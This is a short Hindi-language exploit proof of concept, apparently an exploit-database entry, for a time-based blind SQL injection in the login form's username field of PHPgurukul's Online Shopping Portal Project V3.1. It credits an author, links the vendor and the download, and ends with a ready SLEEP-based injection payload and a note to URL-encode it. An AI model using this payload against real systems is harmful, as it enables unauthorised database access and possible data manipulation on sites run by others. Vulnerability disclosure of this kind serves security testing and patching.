
poc
ऑनलाइन शॉपिंग पोर्टल प्रोजेक्ट V3.1 दूरस्थ हमलावरों को लॉगिन फॉर्म के माध्यम से मनमाने SQL कमांड/क्वेरी निष्पादित करने की अनुमति देता है, जिससे अनधिकृत पहुँच और संभावित डेटा हेरफेर होता है। यह कमज़ोरी उपयोगकर्ता द्वारा प्रदान किए गए इनपुट (उपयोगकर्ता नाम फ़ील्ड) के अपर्याप्त सत्यापन के कारण उत्पन्न होती है, जिससे SQL इंजेक्शन हमले संभव होते हैं।
एक्सप्लॉइट शीर्षक: ऑनलाइन शॉपिंग पोर्टल प्रोजेक्ट V3.1 PHPgurukul - टाइम-बेस्ड ब्लाइंड SQLi
एक्सप्लॉइट लेखक: अक्षद जोशी
विक्रेता होमपेज: https://phpgurukul.com
सॉफ़्टवेयर लिंक: https://phpgurukul.com/shopping-portal-free-download/
परीक्षण किया गया: Linux पर
इस पेलोड का उपयोग करें (इसे URL एनकोड करें):
[email protected]' AND (SELECT 1866 FROM (SELECT(SLEEP(10)))JHcH) AND 'GMDH'='GMDH